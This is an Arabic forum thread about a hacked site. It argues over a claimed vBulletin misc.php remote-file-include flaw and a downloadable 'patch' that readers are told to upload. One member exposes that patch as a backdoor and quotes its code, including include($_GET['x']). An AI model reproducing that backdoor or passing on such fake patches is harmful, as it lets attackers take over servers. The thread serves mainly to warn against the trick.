http://www.w-enter.com/forum/
نبي حل سريع
http://www.w-enter.com/forum/
نبي حل سريع
__________________
Eng.Fedail
Computer and Electronics Engineer
وش السالفة ؟
نعم تم اختراق الموقع بواسطة HAKING MASTER
وقام بحذف الاعضاء والمواضيع والاقسام
والسبب انه يبي يسوي حمله على مواقع الدعم العربيه
مع العلم ان موقعي ليس موقع دعم وانما موقع للتصميم فقط
ولكن ماصدق شاف ثغره وحب يستمتع
حسبي الله ونعم اوكيل
__________________
تعلم الفلاش من الصفر حتى الإحتراف
من خلال دورة :: W-ENTER :: لتعليم الفلاش بالفيديو
http://www.w-enter.com/forum/showthread.php?t=518
W-ENTER.com
ايش هي الثغرة ممكن شوية توضيح
__________________
الحمد لله تعلم الفوركس
W-enter
اخترق؟
حسبي الله ونعم الوكيل
موقع مافيه ذرة شبهه موقع تعليمي بحت
اخوي الثغرة الي قلت عنها الكهف قال انها خاطئة
ومافي ثغرة
شسالفة ياجماعة؟
لا حول ولا قوه الا بالله
والله ما انا فاهم شو قصه هل العالم هذه .
__________________
سيرفراتنا قريبه عليكم جدا ..
اخوي
:: W-ENTER ::
اذا محتاج مساعدة! .. لايردك الا لسانك وكيبوردك
احنا بخدمة الوجيه الطيبه
اخوي
:: W-ENTER ::
اذا محتاج مساعدة! .. لايردك الا لسانك وكيبوردك
احنا بخدمة الوجيه الطيبه![]()
ياريت ياجماعة يجي ويتأكد اخونا الكهف يشوف السالفة
السلام عليكم و رحمة الله و بركاته
هنا الثغرة
السلام عليكم و رحمة الله و بركاته
1-درجة خطورة الثغره : خطيرة جداً جداً جداً جداً (( يدعوها الهاكرز Remote file include و هي تسمح بربط ملف شـــل يسمح بالتحكم بكل السيرفر و ليس المنتدى أو الموقع المستهدف فحسب ))
2- مكتشف الثغره أو الترقيع : BlueGhost
3-المصدر : منتديات المرافق
نبدأ الشرح بسم الله الرحمن الرحيم
بعد تحميلك للملف اللي في المرفقات
فك ضغطه
تطلعلك مجلدات كثيرة
كل مجلد إسمه حسب إصدار vbulletin
صورة :
أدخل المجلد المناسب لإصدار منتداك
تلاقي بداخله ملف misc.php متناسب مع إصدار منتداك
إرفعه في مجلد منتداك ( إفتراضياً يكون vb )
---
إنتهينا
و السلام عليكم و رحمة الله و بركاته
لقيتها في منتدى ثاني و حبيت أنشرها لكم
الثغرة أكتشفت بعد صدور النسخة 3.6.2
و هي موجودة بكل النسخ
ملفات الترقيع هنااااااااااااااااا http://www.m5zn.com/download3.php?fi...0a56121fd2.zip
وأنا جربت الثغرة على منتداكم و هي شغاااااااااااااااااااااااااااااالة و تمكنت من دخول الشل و العبث بكل شئ إلا أن نفسي لم تطاوعني
و السلام عليكم و رحمة الله و بركاته
هذه الثغره كذبه
والملف الموضوع بالرد السابق فيه اكواد تجعل المنتدى سهل الاختراق
ارجو الانتباه من هذه الكذبه التي انتشرت بالمنتدياتكود:$f=trim($f); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include("$f"); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include("$f"); include($_GET['x']);
بس هو سؤال واحد فقط اخوي و لاتفهم قصدي خطأالمشاركة الأصلية كتبت بواسطة الثلج
انت شو عرفك انه منتدى الاخ مازن تم اختراقه بواسطه هذه الثغره كما تدعي ؟
ممكن يكون ثغره ثانيه وليس لها اي علاقه بهذا يلي تتكلم به!!!
__________________
سيرفراتنا قريبه عليكم جدا ..
المشاركة الأصلية كتبت بواسطة b9n9
مع أني لا أفهم بالبرمجة لكني أشهد أنه لما رقعت بهذا الملف إختفت الثغرة ( لأني أعرف إستغلالها )
المشاركة الأصلية كتبت بواسطة Barakat
الهاكر لما إخترق w-enter كتب أنه إخترقه بواسطة ثغرة misc.php
الثغرة موجووووووودة يرجى الترقيع حالاً و إنتوا ما راح تخسروا شئ .. خذوها نصيحة مجرب
أنا متأكد أن الثغره غير موجوده ..
__________________
█████████
█████████
█████████
مع احترامي اخواني لا اعتقد بان الثغره موجوده اصلا بملف misc.php
على ايه حال سوف اتأكد واردلكم خبر بعد قليل
__________________
سيرفراتنا قريبه عليكم جدا ..